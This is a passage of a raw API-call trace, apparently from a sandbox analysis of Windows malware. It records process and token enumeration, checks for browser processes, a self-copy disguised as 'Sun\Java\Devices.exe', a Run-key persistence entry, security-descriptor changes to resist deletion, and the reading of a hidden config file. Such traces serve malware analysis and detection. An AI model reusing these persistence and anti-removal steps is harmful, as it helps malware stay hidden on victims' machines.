dwProcessId=0x910) returned 0x2f0 [0157.384] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.384] CloseHandle (hObject=0x2f0) returned 1 [0157.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0157.384] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.384] CloseHandle (hObject=0x2f0) returned 1 [0157.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0157.384] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.384] CloseHandle (hObject=0x2f0) returned 1 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0157.385] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.385] CloseHandle (hObject=0x2f0) returned 1 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0157.385] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.385] CloseHandle (hObject=0x2f0) returned 1 [0157.385] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0157.385] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0157.386] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0157.386] GetLastError () returned 0x7a [0157.386] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0157.386] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0157.386] CloseHandle (hObject=0x2ec) returned 1 [0157.386] CloseHandle (hObject=0x2f0) returned 1 [0157.386] GetLengthSid (pSid=0x54010a8) returned 0x1c [0157.386] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0157.386] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0157.386] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0157.386] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0157.386] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0157.387] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0157.387] CloseHandle (hObject=0x2f0) returned 1 [0157.387] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) returned 0x102 [0158.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x755fb5c | out: SystemInformation=0x0, ResultLength=0x755fb5c*=0xf5a0) returned 0xc0000004 [0158.412] VirtualAlloc (lpAddress=0x0, dwSize=0x105a0, flAllocationType=0x1000, flProtect=0x4) returned 0x7860000 [0158.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x7860000, Length=0x105a0, ResultLength=0x0 | out: SystemInformation=0x7860000, ResultLength=0x0) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x150) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x194) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0158.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x23c) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x25c) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x354) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x368) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x274) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x230) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x550) returned 0x0 [0158.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x2f0 [0158.417] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.417] CloseHandle (hObject=0x2f0) returned 1 [0158.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x728) returned 0x2f0 [0158.418] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.418] CloseHandle (hObject=0x2f0) returned 1 [0158.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7cc) returned 0x2f0 [0158.418] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.418] CloseHandle (hObject=0x2f0) returned 1 [0158.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4b0) returned 0x2f0 [0158.418] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.418] CloseHandle (hObject=0x2f0) returned 1 [0158.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x910) returned 0x2f0 [0158.418] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.418] CloseHandle (hObject=0x2f0) returned 1 [0158.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa10) returned 0x2f0 [0158.418] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.418] CloseHandle (hObject=0x2f0) returned 1 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x590) returned 0x2f0 [0158.419] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.419] CloseHandle (hObject=0x2f0) returned 1 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb34) returned 0x0 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xba8) returned 0x2f0 [0158.419] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.419] CloseHandle (hObject=0x2f0) returned 1 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0158.419] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.419] CloseHandle (hObject=0x2f0) returned 1 [0158.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc54) returned 0x2f0 [0158.420] OpenProcessToken (in: ProcessHandle=0x2f0, DesiredAccess=0x8, TokenHandle=0x755fb28 | out: TokenHandle=0x755fb28*=0x2ec) returned 1 [0158.420] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x755fb14 | out: TokenInformation=0x0, ReturnLength=0x755fb14) returned 0 [0158.420] GetLastError () returned 0x7a [0158.420] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x1, TokenInformation=0x54010a0, TokenInformationLength=0x24, ReturnLength=0x755fb14 | out: TokenInformation=0x54010a0, ReturnLength=0x755fb14) returned 1 [0158.420] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0xc, TokenInformation=0x755fb40, TokenInformationLength=0x4, ReturnLength=0x755fb2c | out: TokenInformation=0x755fb40, ReturnLength=0x755fb2c) returned 1 [0158.420] CloseHandle (hObject=0x2ec) returned 1 [0158.420] CloseHandle (hObject=0x2f0) returned 1 [0158.420] GetLengthSid (pSid=0x54010a8) returned 0x1c [0158.420] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0158.420] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0158.420] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0158.420] lstrcmpiW (lpString1="panda.exe", lpString2="svchost.exe") returned -1 [0158.420] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdc0) returned 0x2f0 [0158.420] IsWow64Process (in: hProcess=0x2f0, Wow64Process=0x755fb30 | out: Wow64Process=0x755fb30) returned 1 [0158.420] CloseHandle (hObject=0x2f0) returned 1 [0158.421] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x3e8) Thread: id = 25 os_tid = 0xd7c [0120.220] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="4A") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="00") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="00") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="00") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="AF") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="17") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="36") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="6B") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="F4") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="96") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="0A") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="E6") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="2A") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="76") returned 2 [0120.221] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="87") returned 2 [0120.222] wvnsprintfW (in: pszDest=0x769ef58, cchDest=6, pszFmt="%02X", arglist=0x769ef34 | out: pszDest="8C") returned 2 [0120.222] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="4A000000AF17366BF4960AE62A76878C") returned 0x1d4 [0120.222] WaitForSingleObject (hHandle=0x1d4, dwMilliseconds=0xffffffff) returned 0x0 [0120.222] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x769ed06, cbMultiByte=20, lpWideCharStr=0x769eb60, cchWideChar=150 | out: lpWideCharStr="Sun\\Java\\Devices.exe") returned 20 [0120.222] PathCombineW (in: pszDest=0x769f008, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Sun\\Java\\Devices.exe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" [0120.222] PathQuoteSpacesW (in: lpsz="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe" | out: lpsz="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"") returned 1 [0120.222] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1d8 [0120.222] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\Currentversion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x12, lpSecurityAttributes=0x0, phkResult=0x769f2b4, lpdwDisposition=0x0 | out: phkResult=0x769f2b4*=0x1dc, lpdwDisposition=0x0) returned 0x0 [0120.223] RegSetValueExW (in: hKey=0x1dc, lpValueName="Devices.exe", Reserved=0x0, dwType=0x1, lpData="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"", cbData=0x86 | out: lpData="\"C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Sun\\Java\\Devices.exe\"") returned 0x0 [0120.341] RegFlushKey (hKey=0x1dc) returned 0x0 [0120.347] RegNotifyChangeKeyValue (hKey=0x1dc, bWatchSubtree=0, dwNotifyFilter=0x4, hEvent=0x1d8, fAsynchronous=1) returned 0x0 [0120.347] GetLastError () returned 0x0 [0120.347] GetLocalTime (in: lpSystemTime=0x769ef70 | out: lpSystemTime=0x769ef70*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x2fd)) [0120.347] GetCurrentThreadId () returned 0xd7c [0120.347] GetCurrentProcessId () returned 0x2ec [0120.347] wvnsprintfW (in: pszDest=0x5405438, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x769ef14 | out: pszDest="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: ") returned 86 [0120.347] wvnsprintfW (in: pszDest=0x54054e4, cchDest=1962, pszFmt="Selected protection method: protect from deleting.", arglist=0x769ef90 | out: pszDest="Selected protection method: protect from deleting.") returned 50 [0120.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", cchWideChar=136, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 136 [0120.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", cchWideChar=136, lpMultiByteStr=0x5405078, cbMultiByte=137, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", lpUsedDefaultChar=0x0) returned 136 [0120.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", cchWideChar=136, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 136 [0120.348] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", cchWideChar=136, lpMultiByteStr=0x5405110, cbMultiByte=137, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:22] ver=2.2.5, log=0x0009, PID=0x02EC, TID=0x0D7C, LE=0(0x0)\r\nINFO: Selected protection method: protect from deleting.", lpUsedDefaultChar=0x0) returned 136 [0120.349] GetSystemTime (in: lpSystemTime=0x769eb60 | out: lpSystemTime=0x769eb60*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x16, wMilliseconds=0x2fd)) [0120.349] SystemTimeToFileTime (in: lpSystemTime=0x769eb60, lpFileTime=0x769eb50 | out: lpFileTime=0x769eb50) returned 1 [0120.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0120.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412558, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0120.349] GetUserNameExW () returned 0x1 [0120.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0120.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413868, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="8A") returned 2 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="00") returned 2 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="00") returned 2 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="00") returned 2 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="B7") returned 2 [0120.351] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="49") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="67") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="98") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="F6") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="14") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="59") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="35") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="AA") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="3E") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="27") returned 2 [0120.352] wvnsprintfW (in: pszDest=0x769e948, cchDest=6, pszFmt="%02X", arglist=0x769e924 | out: pszDest="60") returned 2 [0120.353] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1ec [0120.353] WaitForSingleObject (hHandle=0x1ec, dwMilliseconds=0xffffffff) returned 0x0 [0120.516] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0120.516] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0120.516] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.517] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.517] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.517] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.517] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.517] GetCurrentThread () returned 0xfffffffe [0120.517] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x769ebac | out: TokenHandle=0x769ebac*=0x0) returned 0 [0120.518] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x769ebac | out: TokenHandle=0x769ebac*=0x1e4) returned 1 [0120.518] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x769ebb4 | out: lpLuid=0x769ebb4*(LowPart=0x8, HighPart=0)) returned 1 [0120.519] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x769ebb0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.519] GetLastError () returned 0x0 [0120.519] CloseHandle (hObject=0x1e4) returned 1 [0120.519] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.519] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x769ebe4, pSacl=0x769ebd8, lpbSaclDefaulted=0x769ebe0 | out: lpbSaclPresent=0x769ebe4, pSacl=0x769ebd8, lpbSaclDefaulted=0x769ebe0) returned 1 [0120.519] SetNamedSecurityInfoW () returned 0x0 [0120.527] LocalFree (hMem=0x52142e0) returned 0x0 [0120.527] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0120.527] GetCurrentThread () returned 0xfffffffe [0120.527] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x769ebac | out: TokenHandle=0x769ebac*=0x0) returned 0 [0120.527] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x769ebac | out: TokenHandle=0x769ebac*=0x1e4) returned 1 [0120.527] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x769ebb4 | out: lpLuid=0x769ebb4*(LowPart=0x8, HighPart=0)) returned 1 [0120.528] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x769ebb0*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.529] GetLastError () returned 0x0 [0120.529] CloseHandle (hObject=0x1e4) returned 1 [0120.529] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0120.529] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52141c0, lpbSaclPresent=0x769ebe4, pSacl=0x769ebd8, lpbSaclDefaulted=0x769ebe0 | out: lpbSaclPresent=0x769ebe4, pSacl=0x769ebd8, lpbSaclDefaulted=0x769ebe0) returned 1 [0120.529] SetNamedSecurityInfoW () returned 0x0 [0120.531] LocalFree (hMem=0x52141c0) returned 0x0 [0120.531] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0120.531] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x769ebf8 | out: lpFileSize=0x769ebf8*=3225) returned 1 [0120.531] VirtualAlloc (lpAddress=0x0, dwSize=0xc99, flAllocationType=0x3000, flProtect=0x4) returned 0x4ee0000 [0120.531] ReadFile (in: hFile=0x1e4, lpBuffer=0x4ee0000, nNumberOfBytesToRead=0xc99, lpNumberOfBytesRead=0x769ec04, lpOverlapped=0x0 | out: lpBuffer=0x4ee0000*, lpNumberOfBytesRead=0x769ec04*=0xc99, lpOverlapped=0x0) returned 1 [0120.537] CloseHandle (hObject=0x1e4) returned 1 [0120.538] wvnsprintfA (in: pszDest=0x5413ba8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366141") returned 10 [0120.539] wvnsprintfA (in: pszDest=0x5413be8, cchDest=21, pszFmt="%d", arglist=0x769eb48 | out: pszDest="1476366141") returned 10 [0120.540] wvnsprintfA (in: 